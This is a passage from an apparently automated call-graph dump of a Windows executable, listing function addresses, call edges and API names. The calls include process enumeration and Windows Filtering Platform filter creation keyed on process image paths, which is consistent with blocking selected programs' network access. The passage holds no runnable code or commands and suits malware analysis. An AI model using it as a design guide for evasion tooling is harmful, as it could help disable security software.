8740 7ff775721486 8730->8740 8734 7ff77572a84a 8733->8734 8735 7ff77572a953 8734->8735 8736 7ff77572a8af VirtualQuery 8734->8736 8735->8724 8737 7ff77572a8d8 8736->8737 8737->8735 8738 7ff77572a907 VirtualProtect 8737->8738 8738->8735 8739 7ff77572a93f GetLastError 8738->8739 8739->8735 8747 7ff775721360 8740->8747 8743 7ff775721496 8766 7ff775721432 8743->8766 8797 7ff7757219c0 GetModuleHandleExA 8747->8797 8755 7ff775721393 8812 7ff77572168c InitializeCriticalSectionAndSpinCount 8755->8812 8756 7ff7757213a1 8756->8743 8774 7ff775729621 8756->8774 8757 7ff7757219c0 8 API calls 8758 7ff7757213cb 8757->8758 8759 7ff775726c99 12 API calls 8758->8759 8760 7ff7757213e7 8759->8760 8859 7ff775726497 8760->8859 8763 7ff7757213f6 8763->8756 8865 7ff7757297f2 8763->8865 9018 7ff77572193c 8766->9018 8769 7ff775721452 8772 7ff77572145e GetProcessHeap HeapFree 8769->8772 8773 7ff775721475 8769->8773 8770 7ff775721446 9025 7ff775726263 8770->9025 8772->8773 8773->8715 8775 7ff775729650 8774->8775 8776 7ff7757296b0 8775->8776 8777 7ff775729656 8775->8777 8779 7ff7757214e2 6 API calls 8776->8779 9039 7ff7757276d0 8777->9039 8780 7ff7757296c6 8779->8780 8780->8743 8782 7ff77572966e 8784 7ff775729672 8782->8784 8785 7ff775729d2d 7 API calls 8782->8785 8783 7ff7757276d0 8 API calls 8783->8782 8786 7ff7757296fc FwpmEngineClose0 8784->8786 9053 7ff775729d2d 8784->9053 8787 7ff7757296ef 8785->8787 8786->8780 8787->8786 8789 7ff775729722 8787->8789 9063 7ff77572855d 8787->9063 8789->8786 8792 7ff775729d2d 7 API calls 8789->8792 8791 7ff7757296ac 8791->8786 8794 7ff775729737 8792->8794 8794->8784 8794->8786 9089 7ff775728cfc 8794->9089 8798 7ff775721376 8797->8798 8799 7ff7757219f2 GetLastError 8797->8799 8801 7ff775726c99 8798->8801 8913 7ff7757214e2 8799->8913 8802 7ff775726cdf 8801->8802 8803 7ff775726caf 8801->8803 8804 7ff7757214e2 6 API calls 8802->8804 8934 7ff775726b9b 8803->8934 8811 7ff77572138f 8804->8811 8807 7ff775726d0f strlen 8808 7ff775726d37 strcat strlen 8807->8808 8809 7ff775726d21 8807->8809 8808->8811 8809->8808 8810 7ff775726d26 strlen 8809->8810 8810->8808 8811->8755 8836 7ff775725e6f 8811->8836 8813 7ff7757216ba 8812->8813 8814 7ff7757217e0 GetLastError 8812->8814 8815 7ff7757219c0 8 API calls 8813->8815 8816 7ff7757214e2 6 API calls 8814->8816 8817 7ff7757216d6 8815->8817 8826 7ff7757217b9 8816->8826 8818 7ff775726b9b 8 API calls 8817->8818 8819 7ff7757216ea 8818->8819 8820 7ff7757216f4 strlen 8819->8820 8819->8826 8822 7ff77572170d 8820->8822 8823 7ff775721723 8820->8823 8821 7ff7757214e2 6 API calls 8827 7ff77572139d 8821->8827 8822->8823 8828 7ff775721712 strlen 8822->8828 8824 7ff775721748 strlen fopen 8823->8824 8825 7ff775721728 strcat strlen 8823->8825 8829 7ff775721797 8824->8829 8830 7ff7757218ad 8824->8830 8825->8824 8826->8821 8827->8756 8827->8757 8828->8823 8831 7ff7757214e2 6 API calls 8829->8831 8832 7ff7757214e2 6 API calls 8830->8832 8833 7ff7757217b1 8831->8833 8832->8826 8833->8826 8834 7ff77572191d 8833->8834 8835 7ff7757214e2 6 API calls 8834->8835 8835->8827 8837 7ff775725f72 8836->8837 8838 7ff775725e86 8836->8838 8841 7ff7757214e2 6 API calls 8837->8841 8839 7ff775725e8f CreateFileA 8838->8839 8840 7ff775725fa2 8838->8840 8844 7ff775725eda LockFileEx 8839->8844 8845 7ff775725fd5 GetLastError 8839->8845 8843 7ff7757214e2 6 API calls 8840->8843 8842 7ff775725f27 8841->8842 8851 7ff775726239 8842->8851 8852 7ff775725f51 8842->8852 8843->8842 8847 7ff7757260ba GetLastError 8844->8847 8848 7ff775725f0e 8844->8848 8846 7ff7757214e2 6 API calls 8845->8846 8856 7ff775725ff6 8846->8856 8850 7ff7757214e2 6 API calls 8847->8850 8848->8842 8849 7ff77572622b CloseHandle 8848->8849 8849->8851 8857 7ff7757260db 8850->8857 8853 7ff7757214e2 6 API calls 8851->8853 8854 7ff7757214e2 6 API calls 8852->8854 8855 7ff775725f67 8853->8855 8854->8855 8855->8755 8856->8847 8858 7ff775726163 8856->8858 8857->8858 8858->8849 8860 7ff7757264a0 GetFileAttributesA 8859->8860 8861 7ff7757264b5 8859->8861 8862 7ff7757264e5 GetLastError 8860->8862 8864 7ff7757213ef 8860->8864 8863 7ff7757214e2 6 API calls 8861->8863 8862->8864 8863->8864 8864->8763 8887 7ff77572433b 8864->8887 8866 7ff77572981a 8865->8866 8867 7ff7757298a5 8865->8867 8962 7ff7757245d5 8866->8962 8869 7ff7757214e2 6 API calls 8867->8869 8871 7ff775729833 8869->8871 8872 7ff77572983d GetProcessHeap HeapFree 8871->8872 8873 7ff775729854 8871->8873 8872->8873 8874 7ff775729b92 8873->8874 8878 7ff77572987c 8873->8878 8875 7ff7757214e2 6 API calls 8874->8875 8877 7ff775729bb4 8875->8877 8876 7ff77572995d GetProcessHeap HeapAlloc 8879 7ff7757299d0 8876->8879 8884 7ff77572999a 8876->8884 8886 7ff7757214e2 6 API calls 8877->8886 8881 7ff7757214e2 6 API calls 8878->8881 8880 7ff7757214e2 6 API calls 8879->8880 8880->8884 8882 7ff775729892 8881->8882 8882->8756 8883 7ff775729ab3 strncpy strncpy 8883->8884 8884->8871 8884->8883 8885 7ff775729b28 strncpy 8884->8885 8885->8884 8886->8877 8888 7ff77572435a 8887->8888 8889 7ff7757243e5 8887->8889 8890 7ff775724363 fopen 8888->8890 8891 7ff775724415 8888->8891 8892 7ff7757214e2 6 API calls 8889->8892 8894 7ff775724448 _errno 8890->8894 8895 7ff775724374 8890->8895 8893 7ff7757214e2 6 API calls 8891->8893 8897 7ff775724388 8892->8897 8893->8897 8896 7ff7757214e2 6 API calls 8894->8896 8895->8897 8898 7ff7757244d6 fwrite 8895->8898 8899 7ff775724470 _errno 8896->8899 8900 7ff77572459a 8897->8900 8905 7ff7757243bb 8897->8905 8901 7ff7757244f8 _errno 8898->8901 8902 7ff7757244ee 8898->8902 8903 7ff775724479 8899->8903 8904 7ff7757244bd _errno 8899->8904 8908 7ff7757214e2 6 API calls 8900->8908 8906 7ff7757214e2 6 API calls 8901->8906 8902->8901 8903->8904 8904->8898 8909 7ff7757214e2 6 API calls 8905->8909 8907 7ff775724520 _errno 8906->8907 8910 7ff775724529 8907->8910 8911 7ff77572456d _errno 8907->8911 8912 7ff7757243d8 8908->8912 8909->8912 8910->8911 8911->8900 8912->8763 8914 7ff7757214f0 8913->8914 8924 7ff77572b210 8914->8924 8917 7ff775721577 fwrite fflush 8920 7ff7757215a0 8917->8920 8918 7ff7757215ac EnterCriticalSection 8919 7ff7757215c6 LeaveCriticalSection 8918->8919 8921 7ff7757215e3 8918->8921 8919->8917 8920->8798 8922 7ff77572161d CopyFileA 8921->8922 8923 7ff775721655 8922->8923 8923->8919 8925 7ff77572b21e 8924->8925 8926 7ff77572b235 8924->8926 8930 7ff77572c2d0 8925->8930 8927 7ff77572c2d0 fputc 8926->8927 8929 7ff775721549 8927->8929 8929->8917 8929->8918 8929->8920 8933 7ff77572c307 8930->8933 8931 7ff77572ca67 8931->8929 8932 7ff77572b3e7 fputc 8932->8933 8933->8931 8933->8932 8935 7ff775726bac 8934->8935 8936 7ff775726be2 8934->8936 8938 7ff775726c12 8935->8938 8939 7ff775726bb1 8935->8939 8937 7ff7757214e2 6 API calls 8936->8937 8940 7ff775726bc7 8937->8940 8941 7ff7757214e2 6 API calls 8938->8941 8942 7ff775726bba 8939->8942 8943 7ff775726c42 8939->8943 8940->8807 8940->8811 8941->8940 8947 7ff775726a5c 8942->8947 8944 7ff7757214e2 6 API calls 8943->8944 8944->8940 8948 7ff775726a76 8947->8948 8949 7ff775726b05 8947->8949 8951 7ff775726a7f 8948->8951 8952 7ff775726b35 8948->8952 8950 7ff7757214e2 6 API calls 8949->8950 8960 7ff775726ac1 8950->8960 8953 7ff775726b68 8951->8953 8954 7ff775726a88 GetModuleFileNameA GetLastError 8951->8954 8955 7ff7757214e2 6 API calls 8952->8955 8957 7ff7757214e2 6 API calls 8953->8957 8956 7ff775726aa2 8954->8956 8955->8960 8958 7ff775726afa 8956->8958 8959 7ff7757214e2 6 API calls 8956->8959 8957->8960 8958->8940 8959->8960 8961 7ff7757214e2 6 API calls 8960->8961 8961->8958 8963 7ff775724675 8962->8963 8964 7ff7757245f7 8962->8964 8965 7ff7757214e2 6 API calls 8963->8965 8966 7ff7757246ba 8964->8966 8967 7ff775724600 8964->8967 8977 7ff7757246b0 8965->8977 8968 7ff7757214e2 6 API calls 8966->8968 8969 7ff775724610 fopen 8967->8969 8970 7ff7757246ed 8967->8970 8968->8977 8971 7ff77572462b fseek 8969->8971 8972 7ff775724720 _errno 8969->8972 8973 7ff7757214e2 6 API calls 8970->8973 8975 7ff7757247f3 8971->8975 8976 7ff775724646 _errno 8971->8976 8974 7ff7757214e2 6 API calls 8972->8974 8973->8977 8978 7ff775724742 _errno 8974->8978 8984 7ff77572482b _errno 8975->8984 8985 7ff775724802 8975->8985 8979 7ff7757214e2 6 API calls 8976->8979 8980 7ff7757214e2 6 API calls 8977->8980 8981 7ff77572474b 8978->8981 8982 7ff77572478f _errno 8978->8982 8983 7ff775724668 _errno 8979->8983 8986 7ff775724b78 8980->8986 8981->8982 8988 7ff77572481e 8982->8988 8983->8963 8987 7ff7757247da _errno 8983->8987 8991 7ff7757214e2 6 API calls 8984->8991 8985->8988 8993 7ff7757248b3 fseek 8985->8993 8986->8871 8986->8876 8987->8988 8989 7ff775724b2d fclose 8988->8989 8990 7ff775724b35 8988->8990 8989->8990 8990->8977 8992 7ff775724ba2 8990->8992 8994 7ff77572484d _errno 8991->8994 8995 7ff7757214e2 6 API calls 8992->8995 8998 7ff7757248cd 8993->8998 8999 7ff775724941 _errno 8993->8999 8996 7ff77572489a _errno 8994->8996 8997 7ff775724856 8994->8997 8995->8986 8996->8988 8997->8996 9001 7ff7757249c9 GetProcessHeap HeapAlloc 8998->9001 9016 7ff7757248df 8998->9016 9000 7ff7757214e2 6 API calls 8999->9000 9002 7ff775724963 _errno 9000->9002 9003 7ff7757249f1 9001->9003 9001->9016 9004 7ff77572496c 9002->9004 9005 7ff7757249b0 _errno 9002->9005 9006 7ff7757214e2 6 API calls 9003->9006 9004->9005 9005->8988 9008 7ff775724a07 9006->9008 9007 7ff775724a9e 9010 7ff775724aa9 9007->9010 9011 7ff7757214e2 6 API calls 9007->9011 9008->9016 9009 7ff77572490d fread 9009->9007 9009->9016 9010->8988 9013 7ff775724ab4 GetProcessHeap HeapFree 9010->9013 9011->9010 9012 7ff775724a0c _errno 9014 7ff7757214e2 6 API calls 9012->9014 9013->8988 9015 7ff775724a2e _errno 9014->9015 9015->9016 9017 7ff775724a7b _errno 9015->9017 9016->8988 9016->9007 9016->9009 9016->9012 9016->9017 9017->9016 9019 7ff77572195b 9018->9019 9020 7ff775721956 fclose 9018->9020 9021 7ff775721989 9019->9021 9022 7ff775721983 DeleteCriticalSection 9019->9022 9020->9019 9023 7ff7757214e2 6 API calls 9021->9023 9022->9021 9024 7ff77572143c 9023->9024 9024->8769 9024->8770 9026 7ff775726272 9025->9026 9027 7ff7757262e4 9025->9027 9028 7ff77572627f UnlockFileEx 9026->9028 9029 7ff775726315 9026->9029 9030 7ff7757214e2 6 API calls 9027->9030 9031 7ff7757262b9 CloseHandle 9028->9031 9032 7ff775726372 GetLastError 9028->9032 9033 7ff7757214e2 6 API calls 9029->9033 9038 7ff77572630d 9030->9038 9035 7ff7757214e2 6 API calls 9031->9035 9034 7ff7757214e2 6 API calls 9032->9034 9033->9038 9034->9038 9036 7ff7757262d8 9035->9036 9036->8769 9037 7ff7757214e2 6 API calls 9037->9036 9038->9037 9040 7ff775727785 9039->9040 9041 7ff775727789 9040->9041 9042 7ff7757277cd 9040->9042 9045 7ff7757277ea 9041->9045 9048 7ff7757277c6 9041->9048 9043 7ff7757214e2 6 API calls 9042->9043 9044 7ff7757277e3 9043->9044 9044->8782 9044->8783 9046 7ff7757214e2 6 API calls 9045->9046 9049 7ff775727800 9046->9049 9047 7ff775727817 FwpmProviderDestroyEnumHandle0 9047->9044 9051 7ff77572788a 9047->9051 9048->9049 9050 7ff775727865 wcscmp 9048->9050 9049->9047 9050->9048 9051->9044 9052 7ff7757214e2 6 API calls 9051->9052 9052->9044 9115 7ff775729bb9 9053->9115 9056 7ff775729537 9057 7ff775729bb9 7 API calls 9056->9057 9060 7ff775729566 9057->9060 9058 7ff77572960d 9058->8791 9060->9058 9062 7ff7757214e2 6 API calls 9060->9062 9132 7ff77572a1f1 9060->9132 9138 7ff77572929a inet_addr ntohl 9060->9138 9062->9060 9064 7ff775729bb9 7 API calls 9063->9064 9065 7ff775728599 9064->9065 9066 7ff7757285dc 9065->9066 9067 7ff7757286c1 GetLastError 9065->9067 9073 7ff7757286df 9065->9073 9069 7ff7757287a3 GetLastError 9066->9069 9088 7ff77572860e 9066->9088 9068 7ff7757214e2 6 API calls 9067->9068 9068->9073 9070 7ff7757287b4 9069->9070 9069->9088 9072 7ff7757214e2 6 API calls 9070->9072 9071 7ff775728ca5 CloseHandle 9071->9073 9072->9088 9073->8789 9074 7ff77572a1f1 11 API calls 9074->9088 9075 7ff7757288cd OpenProcess 9076 7ff775728a78 GetLastError 9075->9076 9077 7ff7757288ee QueryFullProcessImageNameW 9075->9077 9080 7ff7757214e2 6 API calls 9076->9080 9079 7ff77572892e GetLastError 9077->9079 9077->9088 9078 7ff775728669 Process32Next 9081 7ff77572867d GetLastError 9078->9081 9078->9088 9082 7ff7757214e2 6 API calls 9079->9082 9080->9088 9081->9088 9082->9088 9084 7ff7757214e2 6 API calls 9084->9088 9085 7ff775728a13 CloseHandle 9085->9088 9086 7ff7757286af 9086->9085 9087 7ff7757214e2 6 API calls 9086->9087 9087->9086 9088->9071 9088->9074 9088->9075 9088->9078 9088->9084 9088->9085 9088->9086 9182 7ff775728153 9088->9182 9090 7ff775729bb9 7 API calls 9089->9090 9092 7ff775728d38 9090->9092 9091 7ff775729257 9091->8784 9092->9091 9245 7ff775721cf4 9092->9245 9095 7ff775728d82 9097 7ff775728d8a 9095->9097 9099 7ff775721c73 8 API calls 9095->9099 9097->9091 9098 7ff775728da9 FreeLibrary 9097->9098 9098->9091 9100 7ff775728dc6 9099->9100 9100->9091 9101 7ff775721c73 8 API calls 9100->9101 9102 7ff775728de3 9101->9102 9102->9091 9103 7ff775721c73 8 API calls 9102->9103 9104 7ff775728e00 9103->9104 9104->9091 9105 7ff775721c73 8 API calls 9104->9105 9112 7ff775728e18 9105->9112 9106 7ff77572a1f1 11 API calls 9106->9112 9107 7ff775728ecc strlen 9107->9112 9108 7ff7757214e2 6 API calls 9108->9112 9109 7ff775728f64 GetProcessHeap HeapAlloc 9109->9112 9110 7ff775728fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9110->9112 9112->9091 9112->9097 9112->9106 9112->9107 9112->9108 9112->9109 9112->9110 9113 7ff7757291dc LocalFree 9112->9113 9114 7ff7757290f2 GetProcessHeap HeapFree 9112->9114 9261 7ff77572795a GetProcessHeap HeapAlloc 9112->9261 9113->9112 9114->9112 9116 7ff775729bec 9115->9116 9117 7ff775729bd1 9115->9117 9120 7ff7757214e2 6 API calls 9116->9120 9118 7ff775729c1f 9117->9118 9119 7ff775729bd6 9117->9119 9122 7ff7757214e2 6 API calls 9118->9122 9121 7ff775729c52 9119->9121 9124 7ff775729bdb 9119->9124 9127 7ff775729c15 9120->9127 9123 7ff7757214e2 6 API calls 9121->9123 9122->9127 9123->9127 9125 7ff775729cbc 9124->9125 9128 7ff775729c91 strcmp 9124->9128 9126 7ff775729cc3 9125->9126 9125->9127 9129 7ff7757214e2 6 API calls 9126->9129 9130 7ff7757214e2 6 API calls 9127->9130 9128->9124 9131 7ff775729689 9129->9131 9130->9131 9131->8786 9131->8791 9131->9056 9133 7ff77572a22c 9132->9133 9134 7ff77572a200 9132->9134 9135 7ff7757214e2 6 API calls 9133->9135 9145 7ff77572a0f0 9134->9145 9137 7ff77572a217 9135->9137 9137->9060 9140 7ff77572932b 9138->9140 9141 7ff77572937a 9138->9141 9139 7ff77572934f 9139->9060 9140->9139 9143 7ff7757214e2 6 API calls 9140->9143 9142 7ff7757214e2 6 API calls 9141->9142 9144 7ff77572952d 9142->9144 9143->9139 9146 7ff77572a112 9145->9146 9147 7ff77572a153 9145->9147 9157 7ff775729ed0 9146->9157 9148 7ff7757214e2 6 API calls 9147->9148 9156 7ff77572a12b 9148->9156 9151 7ff77572a183 _errno 9152 7ff775730568 9151->9152 9153 7ff77572a1a5 _errno 9152->9153 9154 7ff77572a1b4 _errno 9153->9154 9153->9156 9155 7ff7757214e2 6 API calls 9154->9155 9155->9156 9156->9137 9158 7ff775729f19 9157->9158 9159 7ff775729ee1 9157->9159 9161 7ff7757214e2 6 API calls 9158->9161 9160 7ff775729bb9 7 API calls 9159->9160 9162 7ff775729ef4 9160->9162 9163 7ff775729ef8 9161->9163 9162->9163 9165 7ff775729d40 9162->9165 9163->9151 9163->9156 9166 7ff775729d58 9165->9166 9167 7ff775729d73 9165->9167 9168 7ff775729d5d 9166->9168 9169 7ff775729da6 9166->9169 9170 7ff7757214e2 6 API calls 9167->9170 9172 7ff775729dd9 9168->9172 9178 7ff775729d62 9168->9178 9171 7ff7757214e2 6 API calls 9169->9171 9177 7ff775729d9c 9170->9177 9171->9177 9173 7ff7757214e2 6 API calls 9172->9173 9173->9177 9174 7ff775729e3b 9176 7ff775729e44 9174->9176 9174->9177 9175 7ff775729e18 strcmp 9175->9178 9179 7ff7757214e2 6 API calls 9176->9179 9181 7ff7757214e2 6 API calls 9177->9181 9178->9174 9178->9175 9180 7ff775729e69 9179->9180 9180->9163 9181->9180 9205 7ff775728008 GetFileAttributesW 9182->9205 9185 7ff775728192 wcslen 9222 7ff775727102 9185->9222 9188 7ff7757282b9 FwpmFilterAdd0 9192 7ff7757284ce FwpmFilterAdd0 9188->9192 9193 7ff775728461 9188->9193 9189 7ff775728239 FwpmFilterDeleteByKey0 9190 7ff77572825a 9189->9190 9191 7ff775728277 FwpmFilterDeleteByKey0 9189->9191 9196 7ff7757214e2 6 API calls 9190->9196 9197 7ff77572829c 9191->9197 9203 7ff775728182 9191->9203 9194 7ff775728474 9192->9194 9195 7ff775728540 9192->9195 9198 7ff7757214e2 6 API calls 9193->9198 9201 7ff77572848a GetProcessHeap HeapFree 9194->9201 9202 7ff7757284a1 9194->9202 9199 7ff7757214e2 6 API calls 9195->9199 9196->9203 9200 7ff7757214e2 6 API calls 9197->9200 9198->9194 9199->9194 9200->9203 9201->9202 9202->9203 9204 7ff7757284b2 GetProcessHeap HeapFree 9202->9204 9203->9088 9204->9203 9206 7ff775728149 9205->9206 9207 7ff775728028 9205->9207 9228 7ff775727e04 9207->9228 9209 7ff77572803b 9210 7ff77572804f GetProcessHeap HeapAlloc 9209->9210 9220 7ff775728041 9209->9220 9211 7ff7757280d9 9210->9211 9212 7ff775728071 9210->9212 9214 7ff7757214e2 6 API calls 9211->9214 9213 7ff77572807b wcslen GetProcessHeap HeapAlloc 9212->9213 9212->9220 9215 7ff7757280f7 9213->9215 9219 7ff7757280bb 9213->9219 9214->9212 9218 7ff7757214e2 6 API calls 9215->9218 9216 7ff7757280c7 memcpy 9216->9220 9217 7ff77572810f 9217->9220 9221 7ff775728114 GetProcessHeap HeapFree 9217->9221 9218->9219 9219->9216 9219->9217 9220->9185 9220->9203 9221->9220 9223 7ff77572710b 9222->9223 9224 7ff77572711d 9222->9224 9226 7ff775727110 9223->9226 9227 7ff7757214e2 6 API calls 9223->9227 9225 7ff7757214e2 6 API calls 9224->9225 9225->9226 9226->9188 9226->9189 9227->9226 9229 7ff775727e59 9228->9229 9230 7ff775727e6f QueryDosDeviceW 9229->9230 9235 7ff775727e5f 9229->9235 9231 7ff775727e90 GetLastError 9230->9231 9233 7ff775727f6c 9230->9233 9232 7ff7757214e2 6 API calls 9231->9232 9232->9235 9236 7ff775727de7 9233->9236 9235->9209 9239 7ff77572b270 9236->9239 9240 7ff77572b27e 9239->9240 9241 7ff77572b295 9239->9241 9242 7ff77572dadd fputwc fwprintf _errno 9240->9242 9243 7ff77572dadd fputwc fwprintf _errno 9241->9243 9244 7ff775727dff 9242->9244 9243->9244 9244->9235 9246 7ff775721d2b 9245->9246 9247 7ff775721d02 LoadLibraryA 9245->9247 9248 7ff775721d2e GetLastError 9246->9248 9247->9248 9249 7ff775721d10 9247->9249 9251 7ff7757214e2 6 API calls 9248->9251 9250 7ff7757214e2 6 API calls 9249->9250 9252 7ff775721d29 9250->9252 9251->9252 9252->9095 9253 7ff775721c73 9252->9253 9254 7ff775721c90 GetProcAddress 9253->9254 9255 7ff775721cc1 9253->9255 9256 7ff775721ca1 9254->9256 9257 7ff775721cc6 GetLastError 9254->9257 9255->9257 9258 7ff7757214e2 6 API calls 9256->9258 9259 7ff7757214e2 6 API calls 9257->9259 9260 7ff775721cbf 9258->9260 9259->9260 9260->9095 9262 7ff775727c4f 9261->9262 9263 7ff7757279a1 9261->9263 9264 7ff7757214e2 6 API calls 9262->9264 9265 7ff775727102 6 API calls 9263->9265 9277 7ff775727c3b 9264->9277 9266 7ff7757279b1 9265->9266 9267 7ff775727c6c FwpmFilterDeleteByKey0 9266->9267 9268 7ff775727a46 9266->9268 9269 7ff775727ca7 FwpmFilterDeleteByKey0 9267->9269 9270 7ff775727c8d 9267->9270 9271 7ff775727b20 FwpmFilterAdd0 9268->9271 9273 7ff775727cd2 9269->9273 9269->9277 9272 7ff7757214e2 6 API calls 9270->9272 9275 7ff775727c07 9271->9275 9276 7ff775727cef FwpmFilterAdd0 9271->9276 9272->9277 9274 7ff7757214e2 6 API calls 9273->9274 9274->9277 9278 7ff7757214e2 6 API calls 9275->9278 9279 7ff775727d5d 9276->9279 9277->9112 9280 7ff775727c1a 9278->9280 9281 7ff7757214e2 6 API calls 9279->9281 9280->9277 9282 7ff775727c24 GetProcessHeap HeapFree 9280->9282 9283 7ff775727d7a 9281->9283 9282->9277 9341 7ff775730701 FindClose 10066 7ff77572c600 10067 7ff77572c616 10066->10067 10072 7ff77572c1ae 10067->10072 10069 7ff77572ca67 10070 7ff77572b3e7 fputc 10071 7ff77572c382 10070->10071 10071->10069 10071->10070 10073 7ff77572c1c0 10072->10073 10074 7ff77572b2d0 6 API calls 10073->10074 10075 7ff77572c1f8 10074->10075 10076 7ff77572c20d 10075->10076 10077 7ff77572c21f 10075->10077 10078 7ff77572b5da fputc 10076->10078 10079 7ff77572c290 10077->10079 10082 7ff77572c235 10077->10082 10087 7ff77572c21a 10078->10087 10080 7ff77572c29b strlen 10079->10080 10081 7ff77572c294 10079->10081 10080->10081 10085 7ff77572c08a 11 API calls 10081->10085 10083 7ff77572c239 10082->10083 10084 7ff77572c241 strlen 10082->10084 10086 7ff77572b721 11 API calls 10083->10086 10084->10083 10085->10087 10088 7ff77572c274 10086->10088 10087->10071 10088->10087 10089 7ff77572b3e7 fputc 10088->10089 10089->10088 11057 7ff775721001 11059 7ff77572103c __set_app_type 11057->11059 11060 7ff7757210a9 11059->11060 10596 7ff77572ad0e 10597 7ff77572ad13 signal 10596->10597 10598 7ff77572ad25 signal 10597->10598 10599 7ff77572aca1 10597->10599 10598->10599 11061 7ff77572dc0b 11062 7ff77572ccd9 2 API calls 11061->11062 11066 7ff77572db86 11062->11066 11063 7ff77572e2e0 11064 7ff77572e301 11063->11064 11065 7ff77572ccd9 2 API calls 11063->11065 11065->11064 11066->11063 11067 7ff77572ccd9 fputwc fwprintf 11066->11067 11067->11066 11071 7ff77572131a 11072 7ff775721131 152 API calls 11071->11072 11073 7ff77572132e 11072->11073 9366 7ff775721a19 9367 7ff775721b02 9366->9367 9368 7ff775721a32 9366->9368 9369 7ff7757214e2 6 API calls 9367->9369 9370 7ff775721a3b FindResourceA 9368->9370 9371 7ff775721b2d 9368->9371 9375 7ff775721af2 9369->9375 9373 7ff775721b58 GetLastError 9370->9373 9374 7ff775721a58 LoadResource 9370->9374 9372 7ff7757214e2 6 API calls 9371->9372 9372->9375 9376 7ff7757214e2 6 API calls 9373->9376 9377 7ff775721a70 9374->9377 9378 7ff775721b86 GetLastError GetLastError 9374->9378 9379 7ff775721b79 9376->9379 9381 7ff7757214e2 6 API calls 9377->9381 9380 7ff7757214e2 6 API calls 9378->9380 9379->9375 9379->9378 9380->9375 9381->9375 10600 7ff77572341c 10601 7ff77572342e GetExitCodeProcess 10600->10601 10602 7ff7757234ad 10600->10602 10604 7ff77572350f GetLastError 10601->10604 10605 7ff775723444 10601->10605 10603 7ff7757214e2 6 API calls 10602->10603 10617 7ff7757234d6 10603->10617 10606 7ff7757214e2 6 API calls 10604->10606 10607 7ff775723452 WaitForSingleObject GetExitCodeProcess 10605->10607 10612 7ff7757235f9 TerminateProcess 10605->10612 10605->10617 10606->10617 10608 7ff7757236f1 GetLastError 10607->10608 10609 7ff775723476 10607->10609 10613 7ff7757214e2 6 API calls 10608->10613 10622 7ff7757233c0 10609->10622 10611 7ff7757237ac 10612->10607 10616 7ff77572360a GetLastError 10612->10616 10613->10617 10615 7ff7757214e2 6 API calls 10619 7ff7757234ab 10615->10619 10620 7ff7757214e2 6 API calls 10616->10620 10617->10611 10617->10615 10618 7ff775723484 10621 7ff7757214e2 6 API calls 10618->10621 10620->10605 10621->10619 10623 7ff7757233ec 10622->10623 10624 7ff7757233ce CloseHandle CloseHandle 10622->10624 10626 7ff7757214e2 6 API calls 10623->10626 10625 7ff7757233e5 10624->10625 10625->10617 10625->10618 10626->10625 10627 7ff77572181b 10628 7ff7757217b9 10627->10628 10629 7ff7757214e2 6 API calls 10628->10629 10630 7ff7757217d6 10629->10630 10103 7ff77572c51b 10104 7ff77572c52d 10103->10104 10109 7ff77572bbb4 10104->10109 10106 7ff77572ca67 10107 7ff77572c382 10107->10106 10108 7ff77572b3e7 fputc 10107->10108 10108->10107 10112 7ff77572bbe6 10109->10112 10110 7ff77572bd06 10111 7ff77572bd86 10110->10111 10113 7ff77572b3e7 fputc 10110->10113 10114 7ff77572bda2 10111->10114 10115 7ff77572b3e7 fputc 10111->10115 10112->10110 10116 7ff77572b3e7 fputc 10112->10116 10113->10110 10114->10107 10115->10111 10116->10112 11083 7ff775730721 DeleteCriticalSection 9382 7ff77572e222 9386 7ff77572db86 9382->9386 9383 7ff77572e2e0 9384 7ff77572e301 9383->9384 9388 7ff77572ccd9 9383->9388 9386->9383 9387 7ff77572ccd9 fputwc fwprintf 9386->9387 9387->9386 9389 7ff77572ccf1 9388->9389 9390 7ff77572cd06 9389->9390 9391 7ff77572cd53 9389->9391 9393 7ff77572cd2a fwprintf 9390->9393 9394 7ff77572cd31 9390->9394 9392 7ff77572cd58 9391->9392 9399 7ff77572ca90 9391->9399 9396 7ff77572cdab 9392->9396 9397 7ff77572ca90 fputwc 9392->9397 9393->9394 9394->9384 9396->9394 9398 7ff77572ca90 fputwc 9396->9398 9397->9392 9398->9396 9400 7ff77572caa1 9399->9400 9401 7ff77572cabc 9400->9401 9402 7ff77572cab2 fputwc 9400->9402 9401->9391 9402->9401 9403 7ff775723222 9404 7ff77572325c 9403->9404 9405 7ff775723230 WaitForSingleObject 9403->9405 9407 7ff7757214e2 6 API calls 9404->9407 9406 7ff77572328c GetLastError 9405->9406 9409 7ff775723240 9405->9409 9408 7ff7757214e2 6 API calls 9406->9408 9407->9409 9408->9409 11087 7ff77572ff1f GetModuleHandleW GetProcAddress 11088 7ff77572ff4c LoadLibraryW GetProcAddress 11087->11088 11089 7ff77572ff73 11087->11089 11088->11089 9410 7ff77572f626 9411 7ff77572f65d 9410->9411 9412 7ff77572f63b DeleteCriticalSection 9410->9412 9412->9411 10123 7ff775725923 10124 7ff7757259d4 10123->10124 10125 7ff775725936 10123->10125 10128 7ff7757214e2 6 API calls 10124->10128 10126 7ff77572593f CreateFileA 10125->10126 10127 7ff775725a04 10125->10127 10129 7ff77572597c GetFileSize 10126->10129 10130 7ff775725a34 GetLastError 10126->10130 10131 7ff7757214e2 6 API calls 10127->10131 10134 7ff7757259b4 10128->10134 10132 7ff775725afa GetLastError 10129->10132 10135 7ff77572599b 10129->10135 10130->10135 10131->10134 10132->10135 10133 7ff7757259ab CloseHandle 10133->10134 10135->10133 10135->10134 10645 7ff77572ac27 10646 7ff77572ac4e 10645->10646 10647 7ff77572acdf signal 10646->10647 10649 7ff77572ac6f 10646->10649 10650 7ff77572acb5 10646->10650 10647->10649 10647->10650 10648 7ff77572acfb signal 10648->10649 10650->10648 10650->10649 9413 7ff77572de28 9414 7ff77572de3e 9413->9414 9421 7ff77572d126 9414->9421 9416 7ff77572e2e0 9417 7ff77572e301 9416->9417 9418 7ff77572ccd9 2 API calls 9416->9418 9418->9417 9419 7ff77572db86 9419->9416 9420 7ff77572ccd9 fputwc fwprintf 9419->9420 9420->9419 9422 7ff77572d137 9421->9422 9432 7ff77572d00f 9422->9432 9425 7ff77572d179 9436 7ff77572cc00 9425->9436 9426 7ff77572d186 9440 7ff77572cdd0 9426->9440 9429 7ff77572ca90 fputwc 9431 7ff77572d191 9429->9431 9430 7ff77572d184 9430->9419 9431->9429 9431->9430 9433 7ff77572d02d 9432->9433 9460 7ff77572e4e0 9433->9460 9437 7ff77572cc16 9436->9437 9437->9437 9592 7ff77572cacd 9437->9592 9444 7ff77572cdec 9440->9444 9441 7ff77572ce3d 9442 